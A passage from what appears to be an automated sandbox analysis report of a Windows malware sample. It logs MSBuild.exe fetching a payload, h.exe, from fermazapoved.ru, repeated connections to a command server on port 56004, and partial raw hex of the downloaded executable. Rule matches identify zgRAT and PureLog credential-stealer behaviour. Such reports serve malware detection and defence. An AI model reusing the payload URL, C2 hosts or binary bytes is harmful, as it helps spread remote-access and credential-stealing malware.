                        Aug 5, 2024 05:55:13.095418930 CEST560045481791.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:13.095649958 CEST5481756004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:13.096151114 CEST5481756004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:13.100981951 CEST560045481791.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:18.101365089 CEST5481856004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:18.107853889 CEST560045481891.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:18.107954979 CEST5481856004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:18.108093977 CEST5481856004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:18.113485098 CEST560045481891.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:18.113555908 CEST5481856004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:18.118463993 CEST560045481891.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:25.191005945 CEST560045481891.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:25.191226959 CEST5481856004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:25.191589117 CEST5481856004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:25.196325064 CEST560045481891.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:30.194853067 CEST5481956004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:30.200107098 CEST560045481991.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:30.200242043 CEST5481956004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:30.200304031 CEST5481956004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:30.205063105 CEST560045481991.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:30.205167055 CEST5481956004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:30.210017920 CEST560045481991.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:34.283194065 CEST560045481991.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:34.283313990 CEST5481956004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:34.283873081 CEST5481956004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:34.542525053 CEST560045481991.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:34.542591095 CEST5481956004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:34.543015003 CEST560045481991.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:39.304120064 CEST5482056004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:39.309261084 CEST560045482091.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:39.309353113 CEST5482056004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:39.309432030 CEST5482056004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:39.314208984 CEST560045482091.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:39.314263105 CEST5482056004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:39.319050074 CEST560045482091.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:40.986788034 CEST560045482091.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:40.986892939 CEST5482056004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:40.987266064 CEST5482056004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:40.992419004 CEST560045482091.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:45.991957903 CEST5482156004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:45.998613119 CEST560045482191.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:45.998703003 CEST5482156004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:45.998748064 CEST5482156004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:46.003698111 CEST560045482191.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:46.003760099 CEST5482156004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:46.008687973 CEST560045482191.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:47.709448099 CEST560045482191.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:47.709517956 CEST5482156004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:47.710053921 CEST5482156004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:47.714824915 CEST560045482191.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:52.726217031 CEST5482256004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:52.731456995 CEST560045482291.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:52.731571913 CEST5482256004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:52.731640100 CEST5482256004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:52.736464024 CEST560045482291.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:52.736531973 CEST5482256004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:52.741328955 CEST560045482291.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:54.408734083 CEST560045482291.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:54.408859015 CEST5482256004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:54.409332037 CEST5482256004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:54.414175987 CEST560045482291.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:59.416120052 CEST5482356004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:59.421226025 CEST560045482391.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:59.422413111 CEST5482356004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:59.422461987 CEST5482356004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:59.427253962 CEST560045482391.217.76.162192.168.2.5
                        Aug 5, 2024 05:55:59.428400993 CEST5482356004192.168.2.591.217.76.162
                        Aug 5, 2024 05:55:59.433259964 CEST560045482391.217.76.162192.168.2.5
                        Aug 5, 2024 05:56:01.111848116 CEST560045482391.217.76.162192.168.2.5
                        Aug 5, 2024 05:56:01.112021923 CEST5482356004192.168.2.591.217.76.162
                        Aug 5, 2024 05:56:01.112411022 CEST5482356004192.168.2.591.217.76.162
                        Aug 5, 2024 05:56:01.340156078 CEST560045482391.217.76.162192.168.2.5
                        Aug 5, 2024 05:56:01.340231895 CEST5482356004192.168.2.591.217.76.162
                        Aug 5, 2024 05:56:01.343456984 CEST560045482391.217.76.162192.168.2.5

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Aug 5, 2024 05:54:04.232667923 CEST5841353192.168.2.51.1.1.1
                        Aug 5, 2024 05:54:04.239873886 CEST53584131.1.1.1192.168.2.5
                        Aug 5, 2024 05:54:14.697774887 CEST5656053192.168.2.51.1.1.1
                        Aug 5, 2024 05:54:14.870225906 CEST53565601.1.1.1192.168.2.5
                        Aug 5, 2024 05:54:18.392652988 CEST53597941.1.1.1192.168.2.5
                        Aug 5, 2024 05:54:24.195319891 CEST5297853192.168.2.51.1.1.1
                        Aug 5, 2024 05:54:24.440479040 CEST53529781.1.1.1192.168.2.5

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                        Aug 5, 2024 05:54:04.232667923 CEST192.168.2.51.1.1.10x85Standard query (0)35.37.15.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                        Aug 5, 2024 05:54:14.697774887 CEST192.168.2.51.1.1.10x5d83Standard query (0)fermazapoved.ruA (IP address)IN (0x0001)false
                        Aug 5, 2024 05:54:24.195319891 CEST192.168.2.51.1.1.10xfab8Standard query (0)access.samp-global.comA (IP address)IN (0x0001)false

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                        Aug 5, 2024 05:54:04.239873886 CEST1.1.1.1192.168.2.50x85Name error (3)35.37.15.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                        Aug 5, 2024 05:54:14.870225906 CEST1.1.1.1192.168.2.50x5d83No error (0)fermazapoved.ru62.173.145.78A (IP address)IN (0x0001)false
                        Aug 5, 2024 05:54:15.765044928 CEST1.1.1.1192.168.2.50x3f34No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                        Aug 5, 2024 05:54:15.765044928 CEST1.1.1.1192.168.2.50x3f34No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                        Aug 5, 2024 05:54:16.279186964 CEST1.1.1.1192.168.2.50x1f60No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                        Aug 5, 2024 05:54:16.279186964 CEST1.1.1.1192.168.2.50x1f60No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                        Aug 5, 2024 05:54:24.440479040 CEST1.1.1.1192.168.2.50xfab8No error (0)access.samp-global.com91.217.76.162A (IP address)IN (0x0001)false

                        HTTP Request Dependency Graph

                        • fermazapoved.ru

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.54970662.173.145.78804256C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        TimestampBytes transferredDirectionData
                        Aug 5, 2024 05:54:14.881748915 CEST77OUTGET /images/h.exe HTTP/1.1
                        Host: fermazapoved.ru
                        Connection: Keep-Alive
                        Aug 5, 2024 05:54:15.601490974 CEST396INHTTP/1.1 301 Moved Permanently
                        Server: nginx/1.12.0
                        Date: Mon, 05 Aug 2024 03:54:15 GMT
                        Content-Type: text/html
                        Content-Length: 185
                        Connection: keep-alive
                        Location: https://fermazapoved.ru/images/h.exe
                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.0</center></body></html>


                        HTTPS Proxied Packets

                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        0192.168.2.54970862.173.145.784434256C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        TimestampBytes transferredDirectionData
                        2024-08-05 03:54:16 UTC77OUTGET /images/h.exe HTTP/1.1
                        Host: fermazapoved.ru
                        Connection: Keep-Alive
                        2024-08-05 03:54:16 UTC333INHTTP/1.1 200 OK
                        Server: nginx/1.12.0
                        Date: Mon, 05 Aug 2024 03:54:16 GMT
                        Content-Type: application/octet-stream
                        Content-Length: 811520
                        Connection: close
                        Vary: HTTPS
                        Last-Modified: Sun, 04 Aug 2024 10:23:16 GMT
                        ETag: "c6200-61ed8f2d69814"
                        Accept-Ranges: bytes
                        X-Content-Type-Options: nosniff
                        X-Frame-Options: SAMEORIGIN
                        2024-08-05 03:54:16 UTC16051INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 54 56 af 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 56 0c 00 00 0a 00 00 00 00 00 00 0e 74 0c 00 00 20 00 00 00 80 0c 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 0c 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELTVfVt @ @
                        2024-08-05 03:54:16 UTC16384INData Raw: ec 93 8d 6d 17 d4 b5 14 8e 8c d0 d0 a1 72 40 97 23 ab 55 20 2b 86 60 ea d7 25 8d 71 0b 48 74 cd 8f d9 3a 18 2f fc b9 29 fc b2 96 5a d7 e9 5d 27 7a 40 ef 51 cf 35 0d f5 7c 7a 6c 7d dc 90 b4 b0 b7 5a d9 79 42 99 20 6b a2 48 a1 ef a5 91 60 7a 77 83 52 21 8f 6e 96 9d 51 bc 0c 3f ff a7 92 ca 59 f4 a2 38 3f 31 c5 85 2b e4 86 97 22 c8 0b bd c0 e2 b4 7f 90 46 df e8 2e 0f c6 53 20 c7 e0 a2 2e 46 e5 2d 41 86 c1 95 3c 88 8d 4a 45 9c 31 00 90 d7 98 32 02 3b 9b d9 f9 1d 9a 64 e2 e6 b0 4a d9 80 d7 6c 9e 5a 9c 93 50 72 d7 25 a2 e6 ac 28 39 d8 e2 1b 69 b5 ab 26 7f 53 8a 1c 0e cb 44 a1 df de 15 f8 70 c9 19 dd 52 c8 6d bc a9 77 b5 ad 59 d6 c0 ec b5 10 c2 1a 63 f8 26 2e 54 d2 56 88 aa 2b 3e 2c 63 d9 86 ed 70 89 87 5d 0a f2 d9 2f 44 ac 63 7c d9 69 28 aa e7 dd 57 9f 4a 5c 13
                        Data Ascii: mr@#U +`%qHt:/)Z]'z@Q5|zl}ZyB kH`zwR!nQ?Y8?1+"F.S .F-A<JE12;dJlZPr%(9i&SDpRmwYc&.TV+>,cp]/Dc|i(WJ\
                        2024-08-05 03:54:17 UTC16384INData Raw: ee 2f 54 e2 58 a3 ff 02 e5 ad ef 93 7b 60 6c d2 93 f9 19 b2 b8 4f 87 49 5f 09 e0 85 a9 82 30 a0 87 a4 d5 3e ca 8b f8 2e 4f 2f 6b 3e ab ac 2b 50 a3 78 c0 cb 74 85 91 f8 cb 3a eb e0 56 6a f9 d3 c0 24 3a 91 cf 59 be b5 61 0f 81 02 55 09 35 8e ac cc 3b 79 7b 2a ae d1 76 1b 12 a1 47 ac 7e cd 61 81 5d 19 d8 c7 c5 ba 62 74 03 e1 72 04 12 20 b5 b9 92 c7 2c 18 25 b2 50 05 22 5a 94 de b5 b7 bf 33 7b 34 87 a5 76 7c 91 b6 fd 18 a7 49 2a 34 91 e0 83 47 17 1d 33 8e 84 b7 07 a3 d4 4c 6f b9 4a d5 9c 22 ee 83 a0 34 2c 4b c5 02 47 5f f8 35 32 d2 c1 2d d3 f5 9b 88 8e b7 08 d3 0a 10 87 d4 3c 96 47 38 d9 57 5a 86 fd d7 84 4c 8b d2 43 3a bf de ca b3 4f 24 97 c6 99 e6 a3 45 2f f1 9f c6 73 7f d9 79 fd 8b 8e d1 b2 8d 51 1b 09 6e 3c 7f 2e a2 2a d3 b4 3e 1b 85 03 3d 88 ec 0a 8e aa
                        Data Ascii: /TX{`lOI_0>.O/k>+Pxt:Vj$:YaU5;y{*vG~a]btr ,%P"Z3{4v|I*4G3LoJ"4,KG_52-<G8WZLC:O$E/syQn<.*>=
                        2024-08-05 03:54:17 UTC16384INData Raw: 02 ac 13 0a 07 28 9b da 0c db 21 cd be d4 2f f6 5c eb f3 6e 9a 38 06 d2 62 86 ba 10 77 d5 fd 78 d9 d2 1c 5d bc d4 4c cb f7 af 23 6b 68 b6 7f 2a 82 e7 91 b1 ea e5 a3 32 f5 5a f3 cf 45 f9 6c 1b cc 87 98 2a f5 bc 27 24 0d b6 52 6f 2e 46 8c 15 f9 a4 84 b5 99 b0 03 24 87 4e 2f ce d4 e4 63 a5 2e 8f 20 79 62 8d ab 54 dd fa 41 56 85 2a 03 72 03 a2 76 18 c9 eb 53 89 90 16 45 3a 2a f7 5b 41 41 d9 50 bd c9 81 e6 25 fc 48 8d 7b 07 03 7f 19 4f 3a ff 77 e4 d5 90 64 0b 12 d6 56 cf b1 9c bd 67 41 14 82 44 e9 0d 0e 70 f0 5d 0f 19 95 5c dc 98 00 8d 73 be 26 f7 f7 9a 1a d4 ca ea 43 bb ef 94 5e d3 49 55 44 6e 9f 15 4d a3 3c ab f3 e1 19 b2 3c ce f0 33 fc db ee ed 3d 44 15 57 bc 2a 66 c6 b0 fc f4 b2 69 58 04 ba b6 1a 5e f7 5e 79 06 cb 36 60 f0 3a 13 67 2b 6c 68 88 48 09 c5 b5
                        Data Ascii: (!/\n8bwx]L#kh*2ZEl*'$Ro.F$N/c. ybTAV*rvSE:*[AAP%H{O:wdVgADp]\s&C^IUDnM<<3=DW*fiX^^y6`:g+lhH
                        2024-08-05 03:54:17 UTC16384INData Raw: b2 56 2b 6b f4 5e a6 f0 c2 a8 fa 60 d2 7e a6 34 ea 23 da 93 ce bb 82 9c 28 d9 98 cd d6 ae e0 f9 bd 0b f8 eb 9d 8a 1a 9e c3 84 2f 08 c4 2f 2b 2a 42 ea ae e2 a3 8d 4f da f3 7b 0c 88 67 c0 f0 4e 20 f0 9c 86 4b 5a a4 0d 61 6a 53 de 0d cc f9 aa b5 c7 04 bf 1c 9d 05 f7 7c ca b9 84 6f a6 1d 1a 49 75 b2 3c ba 7b a6 08 66 d5 1b 14 c7 f9 3d 75 1f e9 78 b1 d2 17 17 46 41 60 f9 e6 74 4f 21 52 7c ef 35 f6 2a 5a b9 af 03 16 c3 c6 25 74 80 4d 1f 01 05 e4 36 e1 f6 85 dd 4d fb f6 23 6d c4 c4 c2 7a 23 70 d4 a4 88 bf 64 69 f0 3f f9 d0 32 26 f8 93 28 17 5f b1 dd c5 d0 a4 1e 33 91 33 34 ee 1c 78 94 26 35 53 f5 45 3f f0 b3 15 46 e7 b2 95 fe a1 c3 e2 06 e3 8b 3a 4d e5 15 b6 a7 a2 df 93 89 4f 26 ce 08 3e 9a 4c 44 9d 2f 22 8f cd 4a 01 b4 1c 7a 4f 18 e8 1c 1c a6 48 37 35 31 69 48
                        Data Ascii: V+k^`~4#(//+*BO{gN KZajS|oIu<{f=uxFA`tO!R|5*Z%tM6M#mz#pdi?2&(_334x&5SE?F:MO&>LD/"JzOH751iH
                        2024-08-05 03:54:17 UTC16384INData Raw: 56 10 36 39 62 48 6f 38 27 89 b1 6d ea cb 8e 2f 08 91 cd e9 e4 48 20 4b ad 7c c5 6d c6 54 4c 10 cb 76 be e6 cb 95 11 34 08 68 ef 1f 0e e6 48 2b b7 1f 65 5c 66 bd 5e b4 12 30 8e 3c 7b 2e f4 96 ce f8 ed 2f a7 c2 f4 a3 ae 49 c0 64 4a cf 2f 79 84 e6 dd 7b 04 33 a6 2b 0b 3f e2 c8 4a db 83 c4 3b 8b 9b d1 25 78 23 af 33 db 7b 23 51 bb 40 9d fe 22 15 e9 67 77 7c eb e6 ea 77 7e 72 7d e6 52 6a b0 6a c1 df e7 77 94 bf e8 b0 d7 05 49 8b 95 12 84 96 49 23 a3 ad 5c 54 2e e2 f1 4e 2f ed 49 a2 23 4c da 3c 56 59 b2 15 38 ca d3 a1 7c 49 47 be 0e 31 55 ca 36 92 df 8e be ac a1 fd e5 09 43 c0 cf 5d ae 1c 72 ae 3f 38 26 90 d5 a2 1a 1c b2 b7 e1 38 ec b7 00 77 30 a1 b9 b2 ae 83 4a 97 e9 de d2 fa 61 4d 9e 83 5a 74 7b af 66 11 6a aa 3c ef c6 4d 19 5e e4 1e 63 85 fa f6 84 f7 b8 cd
                        Data Ascii: V69bHo8'm/H K|mTLv4hH+e\f^0<{./IdJ/y{3+?J;%x#3{#Q@"gw|w~r}RjjwII#\T.N/I#L<VY8|IG1U6C]r?8&8w0JaMZt{fj<M^c
                        2024-08-05 03:54:17 UTC16384INData Raw: d0 90 fa 42 8f e9 21 cc dc f2 a0 39 69 54 cd 80 84 10 a3 4e 07 a8 19 ce b9 67 f1 2c 26 9c 0b 7b ca f9 de ec 60 be ea 80 d1 f6 44 dd 47 b1 14 a8 83 63 1e d2 87 93 97 58 2e db 0d 89 4b e7 2f 5d ae cf 32 a6 f1 d9 58 d7 e6 40 1f 23 47 fc 4e 3d b7 8f 46 bc 41 8c 0c 9b d3 de 22 3f f7 7f f0 a7 aa b0 b4 21 d4 c7 c6 98 98 ec 2e 5c 17 80 74 55 d7 a4 d2 b3 df 79 e1 d6 59 e6 6d 60 45 0b 7c 1a 4a 6d a2 83 07 6c 35 a7 ba 3c 71 9a 69 70 5e 45 71 f8 c9 ed 5b 72 e6 8f 7f 2b 1b a9 54 fa e1 42 87 f9 3f ae d8 20 f4 3d 9e 24 51 b6 23 e7 cb 69 be d8 c8 8c c5 b0 74 a5 ff be 52 79 b1 ad f6 96 18 b0 dd c8 e2 92 28 0f 68 e8 96 ef b8 d0 14 52 cf cf 2d 0a 39 19 27 25 61 bc ed c5 dc 35 ef 43 39 ef 30 c7 26 73 2b a6 1a f5 d6 59 b6 57 9b 33 2c 12 c7 98 42 7b 1e 30 d6 5c cb 6f f1 da e0
                        Data Ascii: B!9iTNg,&{`DGcX.K/]2X@#GN=FA"?!.\tUyYm`E|Jml5<qip^Eq[r+TB? =$Q#itRy(hR-9'%a5C90&s+YW3,B{0\o
                        2024-08-05 03:54:17 UTC16384INData Raw: 96 6c 0f bc 40 72 d6 a1 a4 0d 2b 84 07 03 9e 81 ef 40 ac a1 da 83 e5 f8 69 00 14 c2 66 05 bf 38 9f 04 2d 13 aa 11 e4 12 9c dd 7e c0 8c ab 28 07 59 39 b4 44 fa e1 ff 0e 4f 9f 11 a3 e2 5b f1 4b fa a5 10 01 dd 55 fe 47 b4 35 60 b8 1c 5e 8b fa 78 d9 2c 37 67 67 47 48 c1 74 e6 4a 99 c6 a1 20 ac 15 9c b8 9b a3 c5 79 77 e9 fb fb 7f 36 68 68 04 7e b8 06 0c 1f 8e d8 de 96 43 24 48 a6 e9 56 8f 0f 09 03 31 c1 80 b7 56 2c f7 4f 77 e7 28 36 24 d6 09 93 d6 04 a7 9e 8f e1 41 96 93 a7 90 8f 59 b1 15 ea 70 0a 25 a0 1a fe 11 63 d9 f4 55 0e 9d 8d 39 c5 8e a2 f5 40 bf 21 2b 1f 08 23 74 8f 04 ba 43 6a 07 2c 48 6e a6 25 2a 91 6b 98 0d 86 55 9b 03 1c 45 5a 71 c9 ca 27 0d 8a 3c a5 8f 6e a1 bc 75 89 9a 7e 65 b0 d0 2a 5a 2c d2 43 25 c6 24 1e a7 56 79 59 fb ec b6 11 e4 bf 61 65 71
                        Data Ascii: l@r+@if8-~(Y9DO[KUG5`^x,7ggGHtJ yw6hh~C$HV1V,Ow(6$AYp%cU9@!+#tCj,Hn%*kUEZq'<nu~e*Z,C%$VyYaeq
                        2024-08-05 03:54:17 UTC16384INData Raw: 29 3c 18 62 b1 b2 35 38 a8 76 55 2a e3 b7 64 fa 8a 4b a0 bd d8 10 c6 08 5d 94 3d 71 33 f6 35 6e c8 a5 2f 27 61 22 3f b3 1f 06 76 d8 a3 a5 9d 3a 17 c2 0f d0 56 ba 79 74 26 41 61 cd 8e de 8e 98 4e a1 16 9c 77 dc 2e 0d ff 4e 8a d7 40 00 a6 3d 8e ab a2 f4 f3 2a a9 d5 23 ad 38 a4 bd b7 61 6f b7 bd 5c ea 1a 9b ea e4 24 8d b6 a8 1f b0 7e 78 50 aa ad e5 66 bc be 04 db 37 40 db 8a a0 fc f8 d8 6b 66 b9 8e d3 91 b0 78 2d f3 a6 8b 29 91 74 8c 5e b9 67 e5 e9 41 7d fd b5 02 14 83 80 7c 0a db ee 9f c4 6f 73 19 33 a6 27 03 1c 36 7d b1 6e 26 78 34 30 a6 2e ff 74 b1 97 fa cb a3 65 04 66 3f e1 dd 29 74 44 a5 05 d4 85 66 7d 14 1d b3 d7 e0 2e 74 55 13 7f 84 aa 53 63 e6 f5 9c 53 03 a2 1a 0c 47 2a a2 a4 a4 76 92 33 c3 2e ff e2 6c d4 c8 e7 e1 03 31 7e 2f a6 46 32 80 75 5a 48 2f
                        Data Ascii: )<b58vU*dK]=q35n/'a"?v:Vyt&AaNw.N@=*#8ao\$~xPf7@kfx-)t^gA}|os3'6}n&x40.tef?)tDf}.tUScSG*v3.l1~/F2uZH/
                        2024-08-05 03:54:17 UTC16384INData Raw: 39 f9 3b 88 b7 56 6d 44 5e 58 27 bb 9e 5f 09 99 0c bb 40 71 9e 9b ed c9 97 57 db 30 e3 c9 9a df 3a e2 18 95 42 24 21 7c a0 a5 b2 c0 ec f0 88 5c d3 d6 46 f3 90 95 dc 00 73 bf 40 fe bc 81 d0 82 9e fa c2 e9 66 d4 8c 8d 7c 63 e0 b3 14 b6 f0 eb 1a 8d b1 55 d8 5d 05 02 be da 71 b2 17 4d 2c d6 e9 e6 6e c7 92 02 a7 eb 0f 27 13 15 39 13 02 e9 9f b3 7b 0d 4f e6 c9 03 58 24 14 a0 f7 b6 3d 89 50 73 65 0b 24 4c ca d7 e1 1c 23 10 a5 53 b0 cd 7a 48 81 06 64 97 8c 03 bb cd c4 ee 20 4e 80 3e 0e b1 58 bd c7 d2 6e 15 98 19 6f 1b 1e 10 33 54 87 fc 49 e1 9b 22 d9 28 b7 39 a3 88 1c 20 fb 0b 53 fe 6a 3f 45 db 8f f4 6b d3 17 f1 c7 70 cf 4b ed 71 45 6f 54 90 44 b7 91 59 4d bd 2f 1e 6d 12 5f 5c af 23 a6 ee a7 72 96 1a 3e 5e 01 ce 59 04 d5 6c af 36 e9 fe 6d a2 03 78 0a fa 74 32 fc
                        Data Ascii: 9;VmD^X'_@qW0:B$!|\Fs@f|cU]qM,n'9{OX$=Pse$L#SzHd N>Xno3TI"(9 Sj?EkpKqEoTDYM/m_\#r>^Yl6mxt2


                        Statistics

                        CPU Usage

                        Click to jump to process

                        Memory Usage

                        Click to jump to process

                        High Level Behavior Distribution

                        Click to dive into process behavior distribution

                        Behavior

                        Click to jump to process

                        System Behavior

                        General

                        Target ID:0
                        Start time:23:53:56
                        Start date:04/08/2024
                        Path:C:\Users\user\Desktop\x7myVfh5YS.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\x7myVfh5YS.exe"
                        Imagebase:0xa70000
                        File size:1'403'392 bytes
                        MD5 hash:1DE4C3CC42232C1E3D7C09404F57B450
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:1
                        Start time:23:53:56
                        Start date:04/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:3
                        Start time:23:53:56
                        Start date:04/08/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Imagebase:0x940000
                        File size:262'432 bytes
                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2353903041.0000000005C60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000003.00000002.2355748328.0000000006440000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2352224373.00000000059A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2332154673.0000000002CB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high
                        Has exited:true

                        General

                        Target ID:5
                        Start time:23:54:17
                        Start date:04/08/2024
                        Path:C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\AppData\Local\Temp\Qqgmpuehc.exe"
                        Imagebase:0xd90000
                        File size:811'520 bytes
                        MD5 hash:47DA4EB71A23802DAB374E272EAD2F78
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
